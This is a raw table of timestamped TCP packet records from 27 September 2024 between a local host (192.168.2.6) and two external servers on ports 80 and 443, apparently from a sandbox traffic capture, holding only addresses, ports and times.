Sep 27, 2024 00:29:11.519505024 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.519515038 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.519536018 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.519706964 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.519720078 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.519740105 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.519876003 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.520052910 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.520065069 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.520087004 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.520112038 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.520234108 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.520405054 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.520438910 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.520558119 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.520570993 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.520582914 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.520593882 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.520603895 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.520606041 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.520639896 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.520704985 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.520715952 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.520725965 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.520736933 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.520739079 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.520746946 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.520757914 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.520762920 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.520768881 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.520780087 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.520790100 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.520792007 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.520813942 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.520831108 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.521115065 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.521127939 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.521138906 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.521152020 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.521162987 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.521171093 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.521198988 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.521243095 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.521255016 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.521265030 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.521275043 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.521285057 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.521285057 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.521296024 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.521298885 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.521312952 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.521316051 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.521327019 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.521337032 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.521348000 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.521349907 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.521359921 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.521368027 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.521369934 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.521380901 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.521390915 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.521393061 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.521411896 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.521420956 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.521436930 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.521446943 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.521457911 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.521460056 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.521469116 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.521481037 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.521486998 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.521492004 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.521502018 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.521512032 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.521514893 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.521522999 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.521533012 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.521549940 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.521567106 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.521578074 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.521588087 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.521608114 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.521620989 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.521691084 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.521702051 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.521713972 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.521748066 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.521770954 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.521780968 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.521790981 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.521801949 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.521811962 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.521814108 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.521821976 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.521826029 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.521832943 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.521852970 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.521878004 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.521922112 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.521933079 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.521943092 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.521953106 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.521964073 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.521964073 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.521987915 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.522095919 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.522108078 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.522126913 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.522182941 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.522195101 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.522206068 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.522218943 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.522228956 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.522233009 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.522243023 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.522254944 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.522258997 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.522294044 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.530347109 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.560842037 CEST	57909	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:11.560870886 CEST	443	57909	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:11.563395977 CEST	57913	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:11.563443899 CEST	443	57913	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:11.563508987 CEST	57913	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:11.564177990 CEST	57913	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:11.564194918 CEST	443	57913	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:11.609285116 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.609363079 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.609375000 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.609419107 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.609464884 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.609477997 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.609489918 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.609499931 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.609510899 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.609519005 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.609522104 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.609532118 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.609554052 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.609565020 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.609574080 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.609580040 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.609584093 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.609594107 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.609603882 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.609611988 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.609613895 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.609626055 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.609636068 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.609647036 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.609658003 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.609658003 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.609666109 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.609679937 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.609684944 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.609695911 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.609705925 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.609715939 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.609728098 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.609755039 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.609857082 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.609868050 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.609891891 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.610008001 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.610024929 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.610034943 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.610044956 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.610050917 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.610099077 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.610109091 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.610119104 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.610129118 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.610138893 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.610143900 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.610148907 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.610158920 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.610168934 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.610172033 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.610178947 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.610197067 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.610198021 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.610213041 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.610224009 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.610227108 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.610234022 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.610241890 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.610244989 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.610255003 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.610259056 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.610265017 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.610275984 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.610292912 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.610294104 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.610304117 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.610313892 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.610327959 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.610347033 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.610735893 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.610755920 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.610765934 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.610776901 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.610781908 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.610786915 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.610807896 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.610816002 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.610826969 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.610835075 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.610836029 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.610846996 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.610857010 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.610860109 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.610867023 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.610877991 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.610888004 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.610888004 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.610907078 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.610922098 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.610937119 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.610948086 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.610977888 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.611311913 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.611443996 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.611455917 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.611488104 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.611532927 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.611542940 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.611553907 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.611563921 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.611572981 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.611573935 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.611579895 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.611588001 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.611592054 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.611602068 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.611612082 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.611614943 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.611622095 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.611633062 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.611643076 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.611643076 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.611654997 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.611658096 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.611675024 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.611695051 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.612063885 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.612076044 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.612119913 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.612149000 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.612159967 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.612169981 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.612179995 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.612191916 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.612195015 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.612205982 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.612215996 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.612220049 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.612231016 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.612232924 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.612242937 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.612253904 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.612258911 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.612263918 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.612272978 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.612274885 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.612286091 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.612296104 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.612298965 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.612306118 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.612317085 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.612318993 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.612327099 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.612334967 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.612338066 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.612374067 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.613322020 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.613336086 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.613347054 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.613358021 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.613368988 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.613370895 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.613378048 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.613394976 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.613394976 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.613405943 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.613409996 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.613415956 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.613428116 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.613432884 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.613445044 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.613462925 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.613488913 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.614150047 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.701025963 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.701045036 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.701056957 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.701103926 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.701167107 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.701236963 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.701272011 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.701282978 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.701328993 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.701783895 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.701795101 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.701803923 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.701809883 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.701818943 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.701829910 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.701847076 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.701848030 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.701863050 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.701874971 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.701875925 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.701884031 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.701895952 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.701901913 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.701906919 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.701917887 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.701920986 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.701927900 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.701940060 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.701955080 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.701956034 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.701971054 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.701982021 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.701992035 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.702003956 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.702013969 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.702042103 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.702253103 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.702263117 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.702274084 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.702284098 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.702294111 CEST	57911	80	192.168.2.6	147.45.44.104
